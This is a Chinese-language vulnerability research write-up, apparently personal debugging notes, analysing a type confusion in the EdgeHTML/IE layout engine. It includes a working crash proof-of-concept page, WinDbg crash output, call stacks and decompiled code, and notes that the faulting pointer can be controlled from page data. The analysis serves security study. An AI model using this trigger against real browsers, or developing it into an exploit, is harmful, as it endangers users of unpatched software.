漏洞概述

该漏洞是一个由于对传入参数限制不严格导致的类型混淆，错误的将TableGridBoxBuilder 当作 FlowBoxBuilder 对象来使用，导致程序可访问任意地址。该漏洞可以在 IE 和 EDGE 中触发，由于 IE DOM 树的结构并不直观，这里采用 EDGE 进行调试和分析

漏洞样本

漏洞样本如下，为了方便定位漏洞触发相关的 DOM 节点，我在其中加入了一些 text 作为标记

<style>
.class1 { float: left; column-count: 5; background-color:#FFFF00;}
.class2 { column-span: all; columns: 1px; }
</style>
<script>
function boom() {
  document.styleSheets[0].media.mediaText = "sss";
  th1.align = "right";
}
</script>
<body onload="setTimeout(boom,100)">
<table cellspacing="0" border=1>
    <tr class="class1">aaa
        <td id="th1" colspan="5" width=55>ssss</td>
        <th class="class2" width=0>bb
            <div class="class2">cc</div>
        </th>
    </tr>
</table>

漏洞分析

首先查看页面代码，大体流程为， 浏览器首先根据 css 渲染页面， 待页面渲染完成之后使用 media.mediaText = "" 为css 设置媒体属性，使 css 变成非阻塞试的，即使得当前页面不用考虑 css 解析结果就可以进行渲染，(这里只要不是“all”或者“screen”都可以)，再次设置 th1.align 使页面重新渲染，这时的渲染将不会考虑之前的css，从而会使得页面所有元素被重新布局，在这个阶段发生崩溃

打开程序访问样本，漏洞触发点如下,可以看到，程序崩溃在访问 eax 寄存器所指向的地址时，eax 的值可以通过页面中数据进行控制

0:008> g
(d60.132c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000484 ebx=0dbbdd58 ecx=0dbc1fe8 edx=00000006 esi=00000064 edi=13f1ef88
eip=60ef9feb esp=0861d2b0 ebp=0861d2d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
edgehtml!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0x75:
60ef9feb 833800          cmp     dword ptr [eax],0    ds:0023:00000484=????????

下断点 bp EDGEHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0x5d
此处发生函数调用，返回值 eax 作为指针 ，这里总共会发生两次调用，函数参数保存在 ecx 中从 (poi(ebx+0x10)+0x88) 位置获得。

60ef9fda 8b4310          mov     eax,dword ptr [ebx+10h]
60ef9fdd 8b8888000000    mov     ecx,dword ptr [eax+88h]
60ef9fe3 894dec          mov     dword ptr [ebp-14h],ecx
60ef9fe6 e805226eff      call    edgehtml!Layout::Patchable<Layout::PatchableArrayData<Layout::SGridBoxItem> >::Readable (605dc1f0)
60ef9feb 833800          cmp     dword ptr [eax],0

第一次 ebx 为 FlowBoxBuilder 对象；第二次 ebx 为 TableGridBoxBuilder 对象

第一次调用栈为

0:008> k
ChildEBP RetAddr  
0879c6cc 60aacd74 edgehtml!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0x70
0879c6f8 6084431f edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x2b9f4
0879c76c 60843afb edgehtml!Layout::FlowBoxBuilder::MoveToNextPosition+0x2ff
0879c7cc 6091b94e edgehtml!Layout::LayoutBuilderDriver::BuildPageLayout+0x4fb
0879c87c 60936a3a edgehtml!Layout::PageCollection::FormatPage+0x10b
0879c980 6091bcfb edgehtml!Layout::PageCollection::LayoutPagesCore+0x25a
0879c9b8 6091b5c6 edgehtml!Layout::PageCollection::LayoutPages+0xa0
0879c9f4 6091b298 edgehtml!Layout::PageCollection::DoLayout+0x126
0879ca44 6086d717 edgehtml!CView::ExecuteLayoutTasks+0x8d
0879caac 6070bb5b edgehtml!CView::EnsureView+0x2c7
0879cdbc 60708c22 edgehtml!CView::HitTestPoint<0>+0x377
0879ce7c 607089c7 edgehtml!CView::HitTestForMessage<0>+0xb3
0879ceac 606cddaa edgehtml!CDoc::HitTestPoint+0x50

第二次调用栈为

0:008> k
ChildEBP RetAddr  
0879c6cc 60aacd74 edgehtml!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0x70
0879c6f8 6084431f edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x2b9f4
0879c76c 60843afb edgehtml!Layout::FlowBoxBuilder::MoveToNextPosition+0x2ff
0879c7cc 6091b94e edgehtml!Layout::LayoutBuilderDriver::BuildPageLayout+0x4fb
0879c87c 60936a3a edgehtml!Layout::PageCollection::FormatPage+0x10b
0879c980 6091bcfb edgehtml!Layout::PageCollection::LayoutPagesCore+0x25a
0879c9b8 6091b5c6 edgehtml!Layout::PageCollection::LayoutPages+0xa0
0879c9f4 6091b298 edgehtml!Layout::PageCollection::DoLayout+0x126
0879ca44 6086d717 edgehtml!CView::ExecuteLayoutTasks+0x8d
0879caac 6070bb5b edgehtml!CView::EnsureView+0x2c7
0879cdbc 60708c22 edgehtml!CView::HitTestPoint<0>+0x377
0879ce7c 607089c7 edgehtml!CView::HitTestForMessage<0>+0xb3
0879ceac 606cddaa edgehtml!CDoc::HitTestPoint+0x50

我们发现，两次调用栈一样，跟踪程序流程可知，第二次函数调用与第一次在同一函数内部，使用ida查看该上层函数，可以发现，此处是一个循环导致，循环每次取当前 FlowBox 的 ParentBoxBuilder,直到无对象为止，伪代码如下所示，其中取出了一些与漏洞无关的代码，可以看出这里在取出 parentBoxBuilder 之后并没有进行合法性校验就直接使用，从而导致了崩溃。

 while ( 1 )
  {
    if ( !cBoxBuilder )
      return 0;
    if ( Layout::LayoutBoxBuilder::IsMultiColumnBoxBuilder(cBoxBuilder) )
      break;
    if ( Layout::LayoutBoxBuilder::IsFlowBoxBuilder(cBoxBuilder_1) )
      v3 += *((_DWORD *)cBoxBuilder + 171);
 
      /****************
      ****************/
      
      v10 = ((int (*)(void))Layout::Patchable<Layout::PatchableArrayData<Layout::SGridBoxItem>>::Readable)();
      
      /****************
      ****************/
 
    v26 = *(_DWORD *)(*((_DWORD *)cBoxBuilder + 4) + 12);
    cBoxBuilder = Layout::ContainerBoxBuilder::ParentContainerBoxBuilder(cBoxBuilder);
  }

在 HandleColumnBreakOnColumnSpanningElement 函数上下断点，顾名思义，函数是在一个 colume span 属性的对象发生修改时被调用的。 该函数在样本中一共会被调用 32 次， ，通过 BoxBuilder 可以索引到相应的对象，这里崩溃时调用对应的DOM对象为一个 CTableCell ，在页面中对应的为第二个 <th> 标签内部对象。

此次传入函数的参数为 FlowBoxBuilder ，其对应的 DOM 节点对象为 "bb" 文本对象的父 generate 对象， 根据当前节点对应的 FlowBox+0x88 位置设置一个标记位，若该标记位被设置，则依次向上遍历其 parentBoxBuilder

根据单步调试过程可以看出，第一次调用的DOM 对象和崩溃时调用的是同一个，只是其 FlowBox 发生了改变，应该是解析 css 过程中对 box 内容进行了更改。 于是在这里下断点观察。可以看出这里每次发生页面渲染操作时（页面内容发生变化）都会改变，而其偏移 0x88 位置的值则是在如下的调用流程中被修改的，若此处没有被修改，则会诱发崩溃。

088cca84 6060721a edgehtml!Layout::FlowBoxBuilder::AddFlowItem+0x9f
088ccd28 6084529f edgehtml!Layout::FlowBoxBuilder::BuildLine+0x43a
088cce78 6084384f edgehtml!Layout::FlowBoxBuilder::BuildBoxItem+0x11f
088cced4 6091b94e edgehtml!Layout::LayoutBuilderDriver::BuildPageLayout+0x24f

通过调用栈可以看到，这里是发生在构建页面 line 时。

第一次处理 '第二个 <th> 标签' 时,对应的Container 对象为为 FlowBox，正常处理，取 parentBoxBuilder 便会取到 <tr> 对象对应的 ContainerBox，其为 GridBox，与 FlowBox结构不同，从而造成了类型混淆。

后续工作

因为分析的时候遇到了很多困难，所以到网上搜索了一些文档~看到了 0patch ~看到了 0patch 的补丁~ 为什么感觉这个补丁完全没有在修补漏洞呢~

这个漏洞涉及到了css 等一些东西，知识点比较杂乱_{所以分析的也是乱七八糟，这里先记下来作为调试笔记}~~_{和渲染相关的东西有点多}~